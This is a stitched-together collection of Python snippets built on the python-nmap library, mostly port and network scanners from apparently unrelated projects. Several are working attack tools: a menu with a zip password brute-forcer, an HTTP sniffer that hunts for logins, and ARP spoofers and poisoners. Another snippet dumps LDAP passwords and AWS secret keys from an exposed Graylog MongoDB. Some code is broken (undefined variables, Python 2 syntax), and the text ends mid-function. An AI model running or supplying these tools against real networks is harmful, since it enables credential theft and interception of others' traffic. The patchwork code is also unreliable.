def do_scan(targets): parsed = None nm = nmap.PortScanner() nm.scan( hosts=targets, arguments= '-sV -sT -T5 -vvv -Pn -oN "/home/toxic/workspace/reconator/core/results/reconator_%s"' % targets) # subprocess.process() ncsv = nm.csv() r = csv.reader(ncsv) nmenm = '/tmp/nm_reco_%s' % targets f = open(nmenm, 'w') f.write(ncsv) f.close() print('----------------------------------------------------') print("write nm_reco_*") print('----------------------------------------------------') # subprocess.call("/home/toxic/workspace/reconator/core/format_nm.sh") for host in nm.all_hosts(): print('----------------------------------------------------') print('SORT NM.ALL_HOSTS') print('----------------------------------------------------') print('Hostname') print('----------------------------------------------------') print('Host : {0} ({1})'.format(host, nm[host].hostname())) print('----------------------------------------------------') print("nm[host][proto].keys() lport sort") print('----------------------------------------------------') for proto in nm[host].all_protocols(): print('----------') print('Protocol : {0}'.format(proto)) lport = list(nm[host][proto].keys()) lport.sort() for port in lport: print('port : {0}\tstate : {1}'.format(port, nm[host][proto][port])) print('----------------------------------------------------') # fncsv = ncsv.split("\n", 1)[1:] fncsv = ncsv.split("\n", 1) print('----------------------------------------------------') print('csv') print('----------------------------------------------------') print(ncsv) print('----------------------------------------------------') for row in fncsv: if "http" in row: print(row) print("GOTCHA HTTP !!!!!") # print("launch nikto...") for host in nm.all_hosts(): print("launch proof %s " % str(host)) multProc(httpenum, str(host)) # try: #subprocess.call('/usr/bin/nikto %s ' % host) #subprocess.call('echo zob > "/tmp/recotouch" ') #except: # print('vnikto failed') else: print("pas de http") print('----------------------------------------------------') # matchttp = re.search(r'http', str(row)) print('###########################################################') return parsed
def nmap_scan(host, ports): nmap_scanner = nmap.PortScanner() for port in ports: nmap_scanner.scan(host, port) state = nmap_scanner[host]['tcp'][int(port)]['state'] print(f'\n {host} tcp/{port}: {state}')
import nmap import sys if len(sys.argv) < 4: print("Usage: python3 ", __file__, " [IP] [PORT1 [PORT2]]") sys.exit() ip = sys.argv[1] port1 = int(sys.argv[2]) port2 = int(sys.argv[3]) scanner = nmap.PortScanner() for port in range(port1, port2): result = scanner.scan(ip, str(port)) result = result['scan'][ip]['tcp'][port]['state'] print("Port " + str(port) + ": " + result)
import nmap import os import re import multiprocessing import subprocess import csv nm = nmap.PortScanner() nm.scan(hosts='127.0.0.1', arguments='-sT -sV -vvv -oN /tmp/testgrep') nall = nm.all_hosts() ncsv = nm.csv() # ndict = nm.analyse_nmap_xml_scan(()) # nlast = nm.get_nmap_last_output() # nmdict = '/tmp/nm_dict_{0}'.format(ndict) # nmlast = '/tmp/nm_last_{0}'.format(nlast) nmcsv = '/tmp/nm_csv_{0}'.format(ncsv) f = open(nmcsv, 'w') f.write(ncsv) f.close() print('----------------------------------------------------') print("write nm_csv_*") print('----------------------------------------------------') # subprocess.call("/home/toxic/workspace/reconator/core/format_nm.sh") # g = open(nmdict, 'w') # g.write(ndict) # g.close() # print('----------------------------------------------------') # print("write nm_ndict_*")
def nmap_port(host, port): nm = nmap.PortScanner() nm.scan(host, port) if nm[host].state() == 'up': return nm[host]['tcp'][port]
def hack_menu(): print("\n\n\n\n\nPlease choses one of the option below:") print("\n\n1)Ip scanner") print("2)Network Scanner") print("3)Ping") print("4)Zip File Bruteforcer") print("5)Packet Sniffer") print("6)ARP Spoofer") print("0)Back") hack_answer = input("\n\nPlease enter your choice: ") if hack_answer == "1": scanner = nmap.PortScanner() print(""" /$$$$$$$ /$$$$$$$$ /$$ /$$$$$$$$ /$$$$$$ | $$__ $$| $$_____/| $$ |__ $$__//$$__ $$ | $$ \ $$| $$ | $$ | $$ | $$ \ $$ | $$ | $$| $$$$$ | $$ | $$ | $$$$$$$$ | $$ | $$| $$__/ | $$ | $$ | $$__ $$ | $$ | $$| $$ | $$ | $$ | $$ | $$ | $$$$$$$/| $$$$$$$$| $$$$$$$$| $$ | $$ | $$ |_______/ |________/|________/|__/ |__/ |__/ """) print("\n\n\n Welcom to the simple Ip Scanner") print( "\n<--------------------------------------------------------------->" ) ip_addr = input( "\nPlease enter the IP address you want to scan: ") print("\nTarget Ip set to: ", ip_addr) type(ip_addr) ip_menu = input( """\nPlease enter the type of scan you want to run: 1)SYN ACK Scan 2)UDP Scan 3)Comprehensive Scan 0)Back Your choice: """) print("OPTION was set to: ", ip_menu) if ip_menu == "1": print("\n\nNmap Version: ", scanner.nmap_version()) ports_to_scan = input( "Please enter the port numbers which you want to scan\nIf you want to scan every port up until 1024, type ALL: " ).lower() if ports_to_scan == 'all': scanner.scan(ip_addr, '1-1024', '-v -sS') print(scanner.scaninfo()) print("Ip Status: ", scanner[ip_addr].state()) print(scanner[ip_addr].all_protocols()) print("Open Ports: ", scanner[ip_addr]['tcp'].keys()) hack_menu() else: scanner.scan(ip_addr, ports_to_scan, '-v -sS') print(scanner.scaninfo()) print("Ip Status: ", scanner[ip_addr].state()) print(scanner[ip_addr].all_protocols()) print("Open Ports: ", scanner[ip_addr]['tcp'].keys()) hack_menu() elif ip_menu == "2": print("\n\nNmap Version: ", scanner.nmap_version()) ports_to_scan = input( "Please enter the port numbers which you want to scan\nIf you want to scan every port up until 1024, type ALL: " ).lower() if ports_to_scan == 'all': scanner.scan(ip_addr, '1-1024', '-v -sU') print(scanner.scaninfo()) print("Ip Status: ", scanner[ip_addr].state()) print(scanner[ip_addr].all_protocols()) print("Open Ports: ", scanner[ip_addr]['udp'].keys()) hack_menu() else: scanner.scan(ip_addr, ports_to_scan, '-v -sU') print(scanner.scaninfo()) print("Ip Status: ", scanner[ip_addr].state()) print(scanner[ip_addr].all_protocols()) print("Open Ports: ", scanner[ip_addr]['udp'].keys()) hack_menu() elif ip_menu == "3": print("\n\nNmap Version: ", scanner.nmap_version()) ports_to_scan = input( "\nPlease enter the port numbers which you want to scan\nIf you want to scan every port up until 1024, type ALL: " ).lower() if ports_to_scan == 'all': scanner.scan(ip_addr, '1-1024', '-v -sS -sV -sC -A -O') print(scanner.scaninfo()) print("Ip Status: ", scanner[ip_addr].state()) print(scanner[ip_addr].all_protocols()) print("Open Ports: ", scanner[ip_addr]["tcp"].keys()) hack_menu() else: scanner.scan(ip_addr, ports_to_scan, '-v -sS -sV -sC -A -O') print(scanner.scaninfo()) print("Ip Status: ", scanner[ip_addr].state()) print(scanner[ip_addr].all_protocols()) print("Open Ports: ", scanner[ip_addr]["tcp"].keys()) hack_menu() elif ip_menu == "0": hack_menu() else: print( "\n\n Invalid Choice: Please use one of the choices provided" ) hack_menu() elif hack_answer == "2": print( "\n\nPlease specify your routers ip, It might be on of these: " ) print("\n\n" + os.popen('route -n ').read()) router_ip = input("\n\nInput routers IP: ") def scan(ip): print( "\n These are the MAC Ads. linked with the IP's on the network: \n" ) scapy.arping(ip) scan(router_ip + "/24") hack_menu() elif hack_answer == "3": ip_address = input("\n\nPlease enter what you want to ping: ") ping(ip_address, verbose=True, size=40, count=10) hack_menu() elif hack_answer == '4': wordlist = str( input( "Enter the full path of the WORDLIST which you want to use: " )) zip_file = str( input( "Enter the full path of the Zip File which you want to crack: " )) zip_file = zipfile.ZipFile(zip_file) n_words = len(list(open(wordlist, "rb"))) print("Total passwords to test:", n_words) with open(wordlist, "rb") as wordlist: for word in tqdm(wordlist, total=n_words, unit="word"): try: zip_file.extractall(pwd=word.strip()) except: continue else: print("[+] Password found:", word.decode().strip()) hack_menu() print("[!] Password not found, try other wordlist.") hack_menu() elif hack_answer == "5": what_inter = str( input("Specify what interface you want to use: ")) what_filter = str( input( "Specify what filter you want to use (port 22, port 21, udp, http, ect.): " )) if what_filter == "http": what_find = input( "What do you want to catch? (login, url, all): " ).lower() if what_find == "login": try: def sniff(interface): scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet): if packet.haslayer(http.HTTPRequest): url = packet[ http.HTTPRequest].Host + packet[ http.HTTPRequest].Path print("[+]HTTP Request --> " + str(url)) if packet.haslayer(scapy.Raw): load = str(packet[scapy.Raw].load) keywords = [ "uname", "pass", "username", "password", "login" ] for keyword in keywords: if keyword in load: print( "\n\n[+]Possible username and passowrd --> " + str(load) + "\n\n") sniff(what_inter) except KeyboardInterrupt: print( "\n[+] Detected CTRL + C ......... Quitting ") elif what_find == "all": try: def sniff(interface): scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet): if packet.haslayer(http.HTTPRequest): print(packet.load) sniff(what_inter) except KeyboardInterrupt: print( "\n[+] Detected CTRL + C ......... Quitting ") else: print( "\n\nInvalid input, Please use one of the ones provided!" ) hack_menu() else: what_find = input( "What do you want to catch? (login, all): ").lower() if what_find == "login": try: def sniff(interface): scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet, filter=what_filter) def process_sniffed_packet(packet): if packet.haslayer(scapy.Raw): load = str(packet[scapy.Raw]) keywords = [ "uname", "pass", "username", "password", "login" ] for keyword in keywords: if keyword in load: print("\n\n" + load) sniff(what_inter) except KeyboardInterrupt: print( "\n[+] Detected CTRL + C ......... Quitting ") elif what_find == "all": try: def sniff(interface): scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet, filter=what_filter) def process_sniffed_packet(packet): print(packet.show) sniff(what_inter) except KeyboardInterrupt: print( "\n[+] Detected CTRL + C ......... Quitting ") else: print( "\n\nInvalid input, Please use one of the ones provided!" ) hack_menu() elif hack_answer == "6": print( "\n\n Run the Network Scanner to find Devices on the same network" ) target_ip = (input("\nPlease enter the target ip: ")) spoof_ip = (input("Please enter the IP of the router: ")) sent_packets_count = 0 def get_mac(ip): arp_request = scapy.ARP(pdst=ip) broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") arp_request_broadcast = broadcast / arp_request answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] answered_list[0][1].hwsrc clients_list = [] for element in answered_list: client_dict = { "ip": element[1].psrc, "mac": element[1].hwsrc } clients_list.append(client_dict) return clients_list def spoof(target_ip, spoof_ip): target_mac = get_mac(target_ip) packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip) scapy.send(str(packet), verbose=False) def restore(destination_ip, source_ip): destination_mac = get_mac(destination_ip) source_mac = get_mac(source_ip) packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac) scapy.send(packet, count=4, verbose=False) try: while True: spoof(target_ip, spoof_ip) spoof(spoof_ip, target_ip) scapy.send(packet2, verbose=False) sent_packets_count = sent_packets_count + 2 print("\r[+] Packets sent: " + str(sent_packets_count), end="") time.sleep(2) except KeyboardInterrupt: print( "\n[+] Detected CTRL + C ............ Resetting ARP tables... Please wait" ) restore(target_ip, gateway_ip) restore(gateway_ip, target_ip) scapy.send(packet_restore2, count=4, verbose=False) print("[+] Tables Restored") hack_menu() hack_menu() elif hack_answer == "0": question() else: print( "\n\n Invalid Choice: Please use one of the choices provided" ) hack_menu()
def test_mongo_credentials(ip): nm = nmap.PortScanner() try: nm.scan(hosts=ip, arguments='-sT -T4 -p 27017') if nm[ip]['tcp'][MONGODB_PORT]['state'] == 'open': try: client = MongoClient(ip, MONGODB_PORT) db = client.graylog globals.graylog_messages(7) print("[!] " + (str( list( db.ldap_settings.find({}, { 'system_username': 1, '_id': 0 })))).strip(' [{}]')) print("[!] " + (str( list( db.ldap_settings.find({}, { 'system_password': 1, '_id': 0 })))).strip(' [{}]')) print("[!] " + (str( list( db.ldap_settings.find({}, { 'system_password_salt': 1, '_id': 0 })))).strip(' [{}]')) print("[!] " + (str( list(db.ldap_settings.find({}, { 'ldap_uri': 1, '_id': 0 })))).strip(' [{}]')) globals.graylog_messages(8) awsaccesskey = list( db.cluster_config.find( { 'type': 'org.graylog.aws.config.AWSPluginConfiguration' }, { 'payload.access_key': 1, '_id': 0 })) accesskey = str(awsaccesskey).replace( 'payload', '').strip('[{}]').replace("'': {", '') awssecretkey = list( db.cluster_config.find( { 'type': 'org.graylog.aws.config.AWSPluginConfiguration' }, { 'payload.secret_key': 1, '_id': 0 })) secretkey = str(awssecretkey).replace( 'payload', '').strip('[{}]').replace("'': {", '') globals.graylog_messages(9) print("[!] " + accesskey) print("[!] " + secretkey) print(globals.SEPARATOR) except ConnectionFailure: globals.graylog_messages(10) else: globals.graylog_messages(11) except Exception as e: logging.error(e, exc_info=True)
def run_nmap_vulners(ip_addr='', project_id=''): if not ip_addr: raise ValueError('[NMAP_VULNERS] - ip_addr must be specified') scan_id = uuid.uuid4() nmap_vulners_path = os.path.join(settings.BASE_DIR, 'tools/nmap_vulners/vulners.nse') all_nv = nmap_vulners_setting_db.objects.all() for nv in all_nv: nv_enabled = bool(nv.enabled) nv_online = bool(nv.online) nv_version = bool(nv.version) nv_timing = int(nv.timing) args = '' if nv_version: args += ' -sV' if nv_online: args += ' -Pn' if nv_timing: args += ' -T' + str(nv_timing) args += ' --script ' + nmap_vulners_path print('[NMAP_VULNERS][%s] - ARGUMENTS -%s' % (scan_id, args)) nm = nmap.PortScanner() nm = nm.scan(hosts=ip_addr, arguments=args) scan = nm.get('scan') # Rewrite Nmap results each time nmap_vulners_port_result_db.objects.filter(ip_address=ip_addr).delete() for host, host_data in scan.items(): print( '[NMAP_VULNERS][%s] ----------------------------------------------------' % (scan_id)) print('[NMAP_VULNERS][%s] Host : %s (%s)' % (scan_id, host, host_data.get('hostnames'))) parse_port('tcp', host, host_data, scan_id, project_id) parse_port('udp', host, host_data, scan_id, project_id) all_data = nmap_vulners_port_result_db.objects.filter(ip_address=host) # for a in all_data: # global total_ports, ports_p # ports_p = a.port total_ports = len(all_data) # print(total_ports) all_open_p = nmap_vulners_port_result_db.objects.filter( ip_address=host, state='open') # for p in all_open_p: # global total_open_p total_open_p = len(all_open_p) # print(total_open_p) all_close_p = nmap_vulners_port_result_db.objects.filter( ip_address=host, state='closed') total_close_p = len(all_close_p) save_scan = nmap_scan_db( scan_id=scan_id, project_id=project_id, scan_ip=host, total_ports=total_ports, total_open_ports=total_open_p, total_close_ports=total_close_p, ) save_scan.save() print('[NMAP_VULNERS][] - END - scan of domain %s' % (scan_id, format(ip_addr)))
# author:Mr.Chen import sys import nmap scan_row = [] input_data = input('Please input hosts and prot: ') scan_row = input_data.split(" ") if len(scan_row) != 2: print("Input errors,example \"192.168.1.0/24 80,443,22\"") sys.exit() hosts = scan_row[0] # 接收用户输入的主机 port = scan_row[1] # 接收用户输入的端口 try: nm = nmap.PortScanner() # 创建端口扫描对象 except nmap.PortScannerError: print('Nmap not found', sys.exc_info()[0]) sys.exit(0) except: print("Unexpected error:", sys.exc_info()[0]) sys.exit(0) try: # 调用扫描方法,参数指定扫描主机hosts,nmap扫描命令行参数arguments nm.scan(hosts=hosts, arguments='-v -sS -p' + port) except Exception as e: print("Scan erro:" + str(e)) for host in nm.all_hosts(): # 遍历扫描主机 print('-------------------------------------------------------')
def findHostnames(self, int_ip, CIDR): print(bcolors.OKGREEN + " [ HOSTNAMES ENUMERATION MODULE ]\n" + bcolors.ENDC) hostname = socket.gethostname() res_table = PrettyTable([ bcolors.OKGREEN + '[IP]' + bcolors.ENDC, bcolors.OKGREEN + '[Hostname]' + bcolors.ENDC, bcolors.OKGREEN + '[Domain]' + bcolors.ENDC, bcolors.OKGREEN + '[Operating System]' + bcolors.ENDC ], border=False, header=True) res_table.align = "l" print("Searching for hostnames in %s...\n" % CIDR) print("Current Hostname:" + bcolors.TITLE + " %s" % hostname + bcolors.ENDC) print(" ") try: subprocess.call( 'cme -t 50 --timeout 2 smb %s > Results/hostnames' % CIDR, shell=True) #Discover live hosts nm = nmap.PortScanner() nm_arp = nm.scan(hosts=CIDR, arguments="-sn") for x in nm_arp.items()[1][1]: self.live_ips.append(x) self.live_ips.remove(int_ip) subprocess.call( "strings Results/hostnames | grep '445' | awk '{print $2}' > Results/ips_gathered", shell=True) subprocess.call( "strings Results/hostnames | grep '445' | awk '{print $4}' > Results/hostnames_gathered", shell=True) subprocess.call( 'strings Results/hostnames | grep ":" | cut -d ":" -f 3 | cut -d ")" -f 1 > Results/domains_gathered', shell=True) subprocess.call( 'strings Results/hostnames | grep ":" | cut -d "(" -f 1 > Results/operating_systems', shell=True) ips_gathered = [] hostnames_gathered = [] domains_gathered = [] os_gathered = [] # Read files into the lists with open("Results/ips_gathered", "r") as ips: ips_gathered = ips.readlines() with open("Results/hostnames_gathered", "r") as hostnames: hostnames_gathered = hostnames.readlines() with open("Results/domains_gathered", "r") as domains: domains_gathered = domains.readlines() with open("Results/operating_systems", "r") as oper: os_gathered = oper.readlines() subprocess.call("rm Results/ips_gathered", shell=True) subprocess.call("rm Results/hostnames_gathered", shell=True) subprocess.call("rm Results/domains_gathered", shell=True) subprocess.call("rm Results/operating_systems", shell=True) subprocess.call("rm Results/hostnames", shell=True) # Get the array length for the loop length = len(ips_gathered) for i in range(0, length): self.ips_gathered.append(ips_gathered[i].strip()) self.hostnames_gathered.append(hostnames_gathered[i].strip()) self.domains_gathered.append(domains_gathered[i].strip()) os = os_gathered[i].replace("[0m", " ") self.os_gathered.append(os.strip()) # Write the results on stdout and DB for i in range(0, length): if self.ips_gathered[i].strip() != int_ip.strip(): res_table.add_row([ self.ips_gathered[i].strip(), self.hostnames_gathered[i].strip(), self.domains_gathered[i].strip(), self.os_gathered[i].strip() ]) print(res_table) except: print(bcolors.FAIL + "No Hostnames Found\n" + bcolors.ENDC) length = len(self.live_ips) if length != 0: print(bcolors.OKGREEN + "\n [ SCOPE DEFINITION MODULE ]\n" + bcolors.ENDC) for ip in self.live_ips: if ip.strip() != int_ip.strip(): print(bcolors.TITLE + "[+] " + bcolors.ENDC + "%s " % ip.strip() + "added to scope!") else: print( bcolors.WARNING + "NO LIVE IPS FOUND! THERE IS NO NEED TO CONTINUE! WARBERRY WILL NOW EXIT!" + bcolors.ENDC) sys.exit(1)
def nonInteractiveAttack(): print("\n{}nonInteractiveAttack{} activated...{}\n".format( RED, GREEN, END)) target = options.targets print("\n{}Target(s): {}{}".format(GREEN, END, ", ".join(target))) global stopAnimation stopAnimation = False t = threading.Thread(target=scanningAnimation, args=('Checking target status...', )) t.daemon = True t.start() try: nm = nmap.PortScanner() counter = 0 for host in target: a = nm.scan(hosts=host, arguments='-sn') if a['scan'] != {}: for k, v in a['scan'].items(): if str(v['status']['state']) == 'up': pass else: if len(target) == 1 or counter == len(target) - 1: stopAnimation = True sys.stdout.write("\033[K") print( "\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}" .format(RED, END, str(host), RED, END)) os._exit(1) else: sys.stdout.write("\033[K") print( "\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}" .format(RED, END, str(host), RED, END)) target.remove(host) counter += 1 pass else: if len(target) == 1 or counter == len(target) - 1: stopAnimation = True sys.stdout.write("\033[K") print( "\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}" .format(RED, END, str(host), RED, END)) os._exit(1) else: sys.stdout.write("\033[K") print( "\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}" .format(RED, END, str(host), RED, END)) target.remove(host) counter += 1 pass stopAnimation = True sys.stdout.write("\033[K") defaultGatewayIP = getGatewayIP() defaultGatewayMac = retrieveMACAddress(defaultGatewayIP) except KeyboardInterrupt: shutdown() if options.packets is not None: print("\n{}Spoofing started... {}( {} pkts/min )".format( GREEN, END, str(options.packets))) else: print("\n{}Spoofing started... {}".format(GREEN, END)) try: while True: # broadcast malicious ARP packets for i in target: ipAddress = i macAddress = retrieveMACAddress(ipAddress) if macAddress == False: print( "\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}" .format(RED, END)) os._exit(1) spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, ipAddress, macAddress) if options.packets is not None: time.sleep(60 / float(options.packets)) else: time.sleep(10) except KeyboardInterrupt: # re-arp targets on KeyboardInterrupt exception print("\n{}Re-arping{} target(s)...{}".format(RED, GREEN, END)) reArp = 1 while reArp != 10: # broadcast ARP packets with legitimate info to restore connection for i in target: ipAddress = i try: macAddress = retrieveMACAddress(ipAddress) except: print( "\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}" .format(RED, END)) os._exit(1) try: spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, ipAddress, macAddress) except KeyboardInterrupt: pass except: runDebug() reArp += 1 time.sleep(0.2) print("{}Re-arped{} target(s) successfully.{}".format(RED, GREEN, END))
def nmap_A_scan(network_prefix): nm = nmap.PortScanner() scan_raw_result = nm.scan(hosts=network_prefix, arguments='-v -n -A') #print(scan_raw_result['scan']) for host, result in scan_raw_result['scan'].items(): if result['status']['state'] == 'up': print('#' * 17 + 'Host:' + host + '#' * 17) print('-' * 20 + '操作系统猜测' + '-' * 20) for os in result['osmatch']: print('操作系统为: ' + os['name'] + ' 准确度为: ' + os['accuracy']) idno = 1 try: for port in result['tcp']: try: print('-' * 17 + 'TCP服务详细信息' + '[' + str(idno) + ']' + '-' * 17) idno = idno + 1 print('TCP端口号:' + str(port)) try: print('状态: ' + result['tcp'][port]['state']) except: pass try: print('原因: ' + result['tcp'][port]['reason']) except: pass try: print('额外信息: ' + result['tcp'][port]['extrainfo']) except: pass try: print('名字: ' + result['tcp'][port]['name']) except: pass try: print('版本: ' + result['tcp'][port]['version']) except: pass try: print('产品: ' + result['tcp'][port]['product']) except: pass try: print('CPE: ' + result['tcp'][port]['cpe']) except: pass try: print('脚本: ' + result['tcp'][port]['script']) except: pass except: pass except: pass idno = 1 try: for port in result['udp']: try: print('-' * 17 + 'UDP服务详细信息' + '[' + str(idno) + ']' + '-' * 17) idno = idno + 1 print('UDP端口号:' + str(port)) try: print('状态: ' + result['udp'][port]['state']) except: pass try: print('原因: ' + result['udp'][port]['reason']) except: pass try: print('额外信息: ' + result['udp'][port]['extrainfo']) except: pass try: print('名字: ' + result['udp'][port]['name']) except: pass try: print('版本: ' + result['udp'][port]['version']) except: pass try: print('产品: ' + result['udp'][port]['product']) except: pass try: print('CPE: ' + result['udp'][port]['cpe']) except: pass try: print('脚本: ' + result['udp'][port]['script']) except: pass except: pass except: pass print('-' * 20 + '地址详细信息' + '-' * 20) try: print('IP地址: ' + result['addresses']['ipv4']) print('MAC地址: ' + result['addresses']['mac']) except: pass
class Arp: nm = nmap.PortScanner() dns_mac = '' mac_attacker = '' first_call = True # Refresh list of hosts counter = 0 conf = Configuration() def __init__(self): return def poison(self, mac_attacker, mac_victim, ip_victim, ip_to_spoof): # Create false ARP packet arp = Ether() / ARP() arp[Ether].src = mac_attacker arp[ARP].hwsrc = mac_attacker arp[ARP].psrc = ip_to_spoof arp[ARP].hwdst = mac_victim arp[ARP].pdst = ip_victim sendp(arp, verbose=False) def restore(self, machine_a_ip, machine_a_mac, machine_b_ip, machine_b_mac): # TODO Rewrite method on L2 # Broadcast 3 times machine B's correct MAC address send(ARP(op=2, pdst=machine_a_ip, psrc=machine_b_ip, hwdst='ff:ff:ff:ff:ff:ff', hwsrc=machine_b_mac), count=3, verbose=False) # Broadcast 3 times machine A's correct MAC address send(ARP(op=2, pdst=machine_b_ip, psrc=machine_a_ip, hwdst='ff:ff:ff:ff:ff:ff', hwsrc=machine_a_mac), count=3, verbose=False) def get_hosts(self, ip): if self.first_call: print("Obtaining list of alive hosts...") # Refresh list of hosts periodically if self.counter > self.conf.getARPhostsRefreshDelay(): self.nm.scan(ip, arguments='-sP') self.counter = 0 # Check if scan already occurred elif not self.nm.all_hosts(): # Ping scan to get all alive hosts self.nm.scan(ip, arguments='-sP') if self.first_call: print("Done! (" + str(len(self.nm.all_hosts())) + " found)") def poison_all(self, ip_range, dns_ip, dns_mac): if not self.mac_attacker: self.get_nic_mac() self.get_hosts(ip_range) for host in self.nm.all_hosts(): if not host == str(socket.gethostbyname( socket.gethostname())): # Don't poison yourself try: # Poison DNS server self.poison(self.mac_attacker, dns_mac, dns_ip, host) # Poison device # self.poison(self.mac_attacker, self.nm[host]['addresses']['mac'], host, dns_ip) if self.first_call: print("Poisoned " + host) except KeyError: continue # Return true if poisoning was successful and increment counter self.counter = self.counter + 1 if self.first_call: self.first_call = False return True def restore_all(self, ip_range, dns_ip, dns_mac): self.get_hosts(ip_range) for host in self.nm.all_hosts(): try: self.restore(host, self.nm[host]['address']['mac'], dns_ip, dns_mac) except KeyError: continue # Get Pi-Hole's MAC address def get_dns_mac(self, ip): if self.dns_mac is '': scanner = nmap.PortScanner() scanner.scan(ip, arguments='-sP') self.dns_mac = scanner[ip]['addresses']['mac'] return self.dns_mac # Get own MAC address (attacker's) based on NIC defined in conf def get_nic_mac(self): network_interface = self.conf.getNetworkInterface() try: self.mac_attacker = get_if_hwaddr(network_interface) return except Exception as e: sys.exit( "Error, the network interface specified in the configuration was not found." )
import nmap import sys target = str(sys.argv[1]) ports = [21, 22, 80, 139, 443, 8080] scan_v = nmap.PortScanner() print("\nScanning", target, "for ports 21, 22, 80, 139, 443, 8080...\n") for port in ports: portscan = scan_v.scan(target, str(port)) print("Port", port, " is ", portscan['scan'][target]['tcp'][port]['state']) print("\nHost", target, " is ", portscan['scan'][target]['status']['state'])
def nmapScan(tgtHost, tgtPort): # Create the function, this fucntion does the scanning nmScan = nmap.PortScanner() nmScan.scan(tgtHost, tgtPort) state = nmScan[tgtHost]['tcp'][int(tgtPort)]['state'] print "[*] " + tgtHost + " tcp/" + tgtPort + " " + state
def fun(): choice = ("1") banner() while choice != ("12"): menu() choice = input( "\033[1;34m[+]\033[1;m \033[1;91mEnter your choice:\033[1;m ") if choice == ("1"): try: target = input( "\033[1;91mEnter Domain or IP Address: \033[1;m").lower() os.system("reset") print("\033[34mSearching for... Whois Lookup: \033[0m".format( target) + target) time.sleep(1.5) command = ("whois " + target) proces = os.popen(command) results = str(proces.read()) print("\033[1;34m" + results + command + "\033[1;m") except Exception: pass elif choice == ("2"): try: target = input( "\033[1;91mEnter Domain or IP Address: \033[1;m").lower() os.system("reset") print("\033[34mSearching for... DNS Lookup: \033[0m".format( target) + target) time.sleep(1.5) command = ("dig " + target + " +trace ANY") proces = os.popen(command) results = str(proces.read()) print("\033[1;34m" + results + command + "\033[1;m") except Exception: pass elif choice == ("3"): try: os.system("reset") os.system( "gnome-terminal -e 'bash -c \"sudo etherape; exec bash\"'") except Exception: pass elif choice == ("4"): try: target = input( "\033[1;91mEnter Domain or IP Address: \033[1;m").lower() os.system("reset") print("\033[34mScanning.... Nmap Port Scan: \033[0m" + target) print("This will take a moment.\n") time.sleep(1.5) scanner = nmap.PortScanner() command = ("nmap -Pn " + target) process = os.popen(command) results = str(process.read()) logPath = "logs/nmap-" + strftime("%Y-%m-%d_%H:%M:%S", gmtime()) print("\033[34m" + results + command + logPath + "\033[0m") print("\033[34mNmap Version: \033[0m", scanner.nmap_version()) except KeyboardInterrupt: print("\n") print("[-] User Interruption Detected..!") time.sleep(1) elif choice == ("5"): try: target = input( "\033[1;91mEnter Domain or IP Address: \033[1;m").lower() os.system("reset") print("\033[34mScanning.... HTTP Header Grabber: \033[0m\n" + target) time.sleep(1.5) command = ("http -v " + target) proces = os.popen(command) results = str(proces.read()) print("\033[1;34m" + results + command + "\033[1;m") except Exception: pass elif choice == ("6"): target = input( "\033[1;91mEnter the Domain to test: \033[1;m").lower() os.system("reset") if not (target.startswith("http://") or target.startswith("https://")): target = "http://" + target print("\033[1;34mTesting... Clickjacking Test: \033[1;m" + target) time.sleep(2) try: resp = requests.get(target) headers = resp.headers print("\nHeader set are: \n") for item, xfr in headers.items(): print("\033[1;34m" + item + ":" + xfr + "\033[1;m") if "X-Frame-Options" in headers.keys(): print( "\n[+] \033[1;34mClick Jacking Header is present\033[1;m" ) print( "[+] \033[1;34mYou can't clickjack this site !\033[1;m\n" ) else: print( "\n[*] \033[1;34mX-Frame-Options-Header is missing ! \033[1;m" ) print( "[!] \033[1;34mClickjacking is possible,this site is vulnerable to Clickjacking\033[1;m\n" ) except Exception as ex: print("\033[1;34mException caught: " + str(ex)) elif choice == ("7"): try: target = input("\033[1;91mEnter Domain: \033[1;m").lower() os.system("reset") print("\033[34mScanning.... Robots.txt Scanner: \033[0m\n" + target) time.sleep(1.5) if not (target.startswith("http://") or target.startswith("https://")): target = "http://" + target robot = target + "/robots.txt" try: bots = urlopen(robot).read().decode("utf-8") print("\033[34m" + (bots) + "\033[1;m") except URLError: print("\033[1;31m[-] Can\'t access to {page}!\033[1;m". format(page=robot)) except Exception as ex: print("\033[1;34mException caught: " + str(ex)) elif choice == ("8"): try: target = input("\033[1;91mEnter Domain: \033[1;m").lower() os.system("reset") print("\033[34mScanning.... Link Grabber: \033[0m\n" + target) time.sleep(2) if not (target.startswith("http://") or target.startswith("https://")): target = "http://" + target deq = deque([target]) pro = set() try: while len(deq): url = deq.popleft() pro.add(url) parts = urlsplit(url) base = "{0.scheme}://{0.netloc}".format(parts) print("[+] Crawling URL " + "\033[34m" + url + "\033[0m") try: response = requests.get(url) except (requests.exceptions.MissingSchema, requests.exceptions.ConnectionError): continue soup = BeautifulSoup(response.text, "lxml") for anchor in soup.find_all("a"): link = anchor.attrs[ "href"] if "href" in anchor.attrs else '' if link.startswith("/"): link = base + link if not link in deq and not link in pro: deq.append(link) continue except KeyboardInterrupt: print("\n") print("[-] User Interruption Detected..!") time.sleep(1) print( "\n \t\033[34m[!] I like to See Ya, Hacking Anywhere ..!\033[0m\n" ) except Exception: pass elif choice == ("9"): try: target = input( "\033[1;91mEnter Domain or IP Address: \033[1;m").lower() url = ("http://ip-api.com/json/") response = urllib.request.urlopen(url + target) data = response.read() jso = json.loads(data) os.system("reset") print("\033[34mSearching.... IP Location Finder: \033[0m". format(url) + target) time.sleep(1.5) print("\n [+] \033[34mUrl: " + target + "\033[0m") print(" [+] " + "\033[34m" + "IP: " + jso["query"] + "\033[0m") print(" [+] " + "\033[34m" + "Status: " + jso["status"] + "\033[0m") 